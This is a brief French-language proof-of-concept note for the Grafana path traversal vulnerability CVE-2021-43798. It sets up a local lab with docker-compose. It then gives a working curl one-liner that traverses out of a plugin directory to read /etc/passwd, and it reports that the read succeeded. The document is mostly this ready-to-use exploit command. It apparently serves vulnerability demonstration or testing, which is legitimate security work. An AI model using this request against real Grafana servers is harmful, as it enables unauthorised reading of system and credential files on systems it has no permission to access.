
Exploit de preuve de concept pour la vulnérabilité de traversée de chemin Grafana (CVE-2021-43798) permettant la lecture non autorisée de fichiers via une traversée de répertoire dans les chemins de plugins.
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd a permis d'accéder à etc/passwd.